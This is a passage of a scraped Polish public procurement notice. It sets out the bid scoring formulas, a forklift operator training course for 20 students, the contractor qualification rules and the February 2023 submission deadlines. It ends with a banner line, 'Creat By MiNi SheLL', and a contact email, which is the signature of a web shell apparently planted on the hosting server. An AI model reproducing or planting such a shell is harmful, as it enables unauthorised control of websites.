poniższego wzoru.<br/><br/> najniższa cena brutto spośród badanych ofert <br/>„C” : -----------------------------------------------------------x 60 % x 100 = liczba punktów<br/> cenę brutto badanej oferty <br/><br/>- obliczenia będą dokonywane do dwóch miejsc po przecinku<br/><br/>b) „doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń” D - 40% – maksymalna liczba pkt. do otrzymania 40, które zostaną przyznane, na podstawie złożonego przez Wykonawcę oświadczenia zawartego w formularzu ofertowym, który stanowi załącznik nr 1 do SWZ. <br/>Przyznana zostanie następująca ilość punktów za w/w kryterium:<br/>- doświadczenie - powyżej 5 lat - 40 pkt<br/>- doświadczenie - powyżej 3 lat do 5 lat - 30 pkt.<br/>- doświadczenie - powyżej 1 roku do 3 lat - 10 pkt.<br/>- doświadczenie - do 1 roku – 0 pkt.<br/>Uwaga!<br/>Brak zaznaczenia lub zaznaczenie więcej niż jednej pozycji w formularzu ofertowym będzie skutkowało odrzuceniem oferty.<br/>1.2. Łączna ocena oferty:<br/>P = C + G<br/>P – łączna liczba punktów<br/>C – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>D – ilość punktów przyznanych Wykonawcy dla kryterium „Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń”<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oceny dokonywać będą członkowie Komisji przetargowej, stosując zasadę, iż oferta nieodrzucona zawierająca łącznie najwyższą ilość punktów w w/w kryteriach jest ofertą najkorzystniejszą. Zamawiający przyjmie do porównania ofert ceny z uwzględnieniem podatku VAT, jaki będzie musiał zapłacić za wykonanie zamówienia (tj. wartości brutto złożonych ofert).<br/>4. Wyboru najkorzystniejszej oferty dokona Starosta Opoczyński, zatwierdzając propozycję Komisji przetargowej.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ VI<br/>KURS KIEROWCA WÓZKÓW PODNOŚNIKOWYCH ZE ZMIENNYM WYSIĘGIEM<br/><br/>Zakres kursu<br/>Tematyka zawierać będzie m. in.: ogólne wiadomości o wózkach podnośnikowych (3 godz.); budowa wózków specjalizowanych (6 godz.); obsługa wózków specjalizowanych – czynności Operatora (8 godz.); wiadomości o dozorze technicznym (4 godz.); wiadomości z zakresu BHP (8 godz.); obsługa wózków podnośnikowych - zajęcia praktyczne (10 godz.).<br/><br/>Kompetencje jakie uzyska uczestnik kursu<br/>UCZESTNIK KURSU UZYSKA KOMPETENCJE przygotowujące do przystąpienia do egzaminu przed Komisją Urzędu Dozoru Technicznego<br/><br/>Warunki szczegółowe<br/>1.	Liczba osób objętych kursem 20 osób.<br/>2.	Czas trwania kursu: 39 godzin (29 godz. teoria, 10 godz. praktyka).<br/>3.	Uczestnikami/uczestniczkami kursu będą słuchacze kształcący się w Centrum Kształcenia Zawodowego i Ustawicznego w Powiatowym Centrum Kształcenia Zawodowego i Ustawicznego <br/>w Mroczkowie Gościnnym.<br/>4.	Wykonawca zapewni wykładowcę posiadającego uprawnienia do prowadzenia przedmiotowego kursu.<br/>5.	Realizacja kursu zgodnie z zakresem kursu. <br/>Nabyte umiejętności zostaną dokładnie określone w zaświadczeniu opracowanym przez Wykonawcę.<br/>6.	Realizacja i zakres kursu zgodnie z programem kursu zatwierdzonym przez dozór techniczny. <br/>7.	Harmonogram kursu opracowany przez Wykonawcę wymaga wcześniejszej akceptacji Dyrektora Powiatowego Centrum Kształcenia Zawodowego i Ustawicznego w Mroczkowie Gościnnym. <br/>8.	Właściwe udokumentowanie kursu na potrzeby realizacji projektu:<br/>- przekazanie szczegółowego programu kursu;<br/>- weryfikacja nabytych umiejętności określonych w przedmiocie zamówienia;<br/>- potwierdzenie nabycia umiejętności określonych w przedmiocie zamówienia;<br/>- Wykonawca zobowiązany będzie do prowadzenia listy obecności, dziennika zajęć oraz przekazania ich Zamawiającemu po zakończonym kursie. <br/>9.	Po zakończeniu kursu uczestnicy otrzymają zaświadczenia opisujące zestaw nabytych kompetencji oraz liczbę godzin zrealizowanych zajęć określonych w pkt. 2.<br/>10.	Po zdanym egzaminie kwalifikacyjnym uczestnik/uczestniczka uzyska dokument potwierdzający uzyskanie kwalifikacji w zakresie: wózki jezdniowe podnośnikowe z mechanicznym napędem podnoszenia z wysięgnikiem oraz wózki jezdniowe podnośnikowe z mechanicznym napędem podnoszenia z osobą obsługującą podnoszoną wraz z ładunkiem (uprawnia również do obsługi wszystkich pozostałych wózków jezdniowych podnośnikowych z mechanicznym napędem podnoszenia) tj. zaświadczenie kwalifikacyjne wystawione przez Urząd Dozoru Technicznego.<br/>11.	Przedmiot zamówienia zawiera wydatki związane z pełną organizacją kursu m.in. badania lekarskie, przeprowadzenie kursu, koszt egzaminu oraz ewentualny koszt egzaminu poprawkowego (przewidziano 3 egzaminy poprawkowe dla uczestnika kursu), wynagrodzenie kadry dydaktycznej posiadającej kwalifikacje zawodowe odpowiednie do prowadzenia kształcenia praktycznego i teoretycznego, odpowiednie pomieszczenia wyposażone w sprzęt i pomoce dydaktyczne, w tym maszyny umożliwiające prawidłową realizację kształcenia i przygotowanie do egzaminu zapewniające bezpieczne i higieniczne warunki nauki, wynajęcie i eksploatacja sal, sprzętu technicznego, wyposażenie sal niezbędnych do przeprowadzenia kursu, właściwe udokumentowanie przebiegu kursu o którym mowa w pkt. 8, zaświadczenia potwierdzające ukończenie kursu wraz <br/>z opisem uzyskanych umiejętności, obsługę administracyjną, materiały szkoleniowe, itp.<br/>12.	Rozliczenia za wykonanie usługi dokona się: <br/>a) za zrealizowanie kursu dla 20 osób objętych kursem, <br/>b) za faktyczną liczbę zrealizowanych egzaminów poprawkowych dla każdego z uczestników kursu (maksymalnie za 3 egzaminy poprawkowe dla uczestnika). <br/>13.	Termin wykonania: 4 miesiące od dnia podpisania umowy, nie później niż do 16.06.2023r.<br/>14.	Miejsce przeprowadzenia kursu: na terenie gminy Opoczno </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis stosowanych kryteriów oraz sposób ich obliczenia.<br/>1.1. kryteria przyjęte do oceny ofert:<br/>a) „cena” C - 60% - maksymalna liczba pkt. do otrzymania 60 wg poniższego wzoru.<br/><br/> najniższa cena brutto spośród badanych ofert <br/>„C” : -----------------------------------------------------------x 60 % x 100 = liczba punktów<br/> cenę brutto badanej oferty <br/><br/>- obliczenia będą dokonywane do dwóch miejsc po przecinku<br/><br/>b) „doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń” D - 40% – maksymalna liczba pkt. do otrzymania 40, które zostaną przyznane, na podstawie złożonego przez Wykonawcę oświadczenia zawartego w formularzu ofertowym, który stanowi załącznik nr 1 do SWZ. <br/>Przyznana zostanie następująca ilość punktów za w/w kryterium:<br/>- doświadczenie - powyżej 5 lat - 40 pkt<br/>- doświadczenie - powyżej 3 lat do 5 lat - 30 pkt.<br/>- doświadczenie - powyżej 1 roku do 3 lat - 10 pkt.<br/>- doświadczenie - do 1 roku – 0 pkt.<br/>Uwaga!<br/>Brak zaznaczenia lub zaznaczenie więcej niż jednej pozycji w formularzu ofertowym będzie skutkowało odrzuceniem oferty.<br/>1.2. Łączna ocena oferty:<br/>P = C + G<br/>P – łączna liczba punktów<br/>C – ilość punktów przyznanych Wykonawcy dla kryterium „Cena”<br/>D – ilość punktów przyznanych Wykonawcy dla kryterium „Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń”<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oceny dokonywać będą członkowie Komisji przetargowej, stosując zasadę, iż oferta nieodrzucona zawierająca łącznie najwyższą ilość punktów w w/w kryteriach jest ofertą najkorzystniejszą. Zamawiający przyjmie do porównania ofert ceny z uwzględnieniem podatku VAT, jaki będzie musiał zapłacić za wykonanie zamówienia (tj. wartości brutto złożonych ofert).<br/>4. Wyboru najkorzystniejszej oferty dokona Starosta Opoczyński, zatwierdzając propozycję Komisji przetargowej.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby wyznaczonej do prowadzenia kursów/szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla części I-VI <br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa żadnych wymagań co do potwierdzenia spełniania tego warunku.<br/>1.2.uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa żadnych wymagań co do potwierdzenia spełniania tego warunku.<br/>1.3.sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa żadnych wymagań co do potwierdzenia spełniania tego warunku.<br/>1.4.	zdolności technicznej lub zawodowej<br/>Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w okresie działalności, a w przypadku świadczeń okresowych lub ciągłych również tych wykonywanych, co najmniej 2 usług w zakresie kursów/szkoleń, odpowiadających swoim rodzajem przedmiotowi niniejszego postępowania, tj. odpowiadające tematyce każdej z części I-VI (w zależności do której części Wykonawca składa ofertę), a usługi te zostały wykonane lub są wykonywane należycie.<br/>Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.<br/>UWAGA:<br/>Zamawiający zastrzega, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek nie podlega sumowaniu, tj. jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi wykazać się całym wymaganym doświadczeniem powyżej (warunek nie będzie spełniony, jeżeli wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie nie wykazał się całym wymaganym doświadczeniem).<br/>Powyższa uwaga odnosi się także do sytuacji, gdy warunek, o którym mowa w pkt. 1.4. zostanie spełniony przez podmiot udostępniający zasoby Wykonawcy, tzw. podmiot trzeci.<br/>2.Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania (art. 116 ust. 2 ustawy Pzp).<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (art. 117 ust. 3 ustawy Pzp).<br/>4. Sposób wykazania warunków udziału w postępowaniu wskazano w rozdziale IX SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie o braku podstaw wykluczenia wg załącznika nr 2 i 2a do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie o spełnieniu warunków udziału w postępowaniu wg załącznika nr 3 i 3a do SWZ<br/>2. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia - załącznik nr 4 do SWZ – jeżeli dotyczy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy – załącznik nr 1 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu lub do reprezentowania ich w postępowaniu i zawarcia umowy. Do oferty należy załączyć oryginał pełnomocnictwa lub kopię poświadczoną za zgodność z oryginałem przez notariusza.<br/>2.	Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia i wskazywać zakres/czynności pełnomocnictwa. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji działalności gospodarczej. <br/>4.	Dokument pełnomocnictwa musi być podpisany w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>5.	Pełnomocnik pozostaje w kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.<br/>6.	Wspólnicy spółki cywilnej/uczestnicy konsorcjum są traktowani jak Wykonawcy składający ofertę wspólną.<br/>7.	Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę wspólną mają obowiązek na żądanie przedstawić Zamawiającemu umowę konsorcjum/umowę spółki cywilnej.<br/>8.	Oświadczenia, o których mowa w ust. 1 Rozdziału IX SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie (wg załącznika 2 do SWZ). Dokumenty te potwierdzają brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekt umowy - załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-03 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający dopuszcza składania ofert częściowych.<br/>2.	Ofertę można składać na wszystkie części zamówienia.<br/>3.	Zamawiający nie dopuszcza składania ofert wariantowych.<br/>4.	Zamawiający nie przewiduje wymagań wskazanych w art. 96 ust. 2 pkt 2 ustawy Pzp.<br/>5.	Zamawiający nie przewiduje zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp.<br/>6.	Zamawiający nie wymaga przeprowadzenia przez Wykonawcę wizji lokalnej lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, o których mowa w art. 131 ust. 2 ustawy Pzp.<br/>7.	Zamawiający nie przewiduje rozliczenia między Zamawiającym a Wykonawcą w walutach obcych.<br/>8.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>9.	Zamawiający nie wymaga obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań zgodnie z art. 60 i art. 121 ustawy Pzp.<br/>10. Zgodnie z ustawą z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych wyklucza się:<br/>10.1. wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>10.2. wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 ze zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub<br/>będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego;<br/>10.3. wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217 ze zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com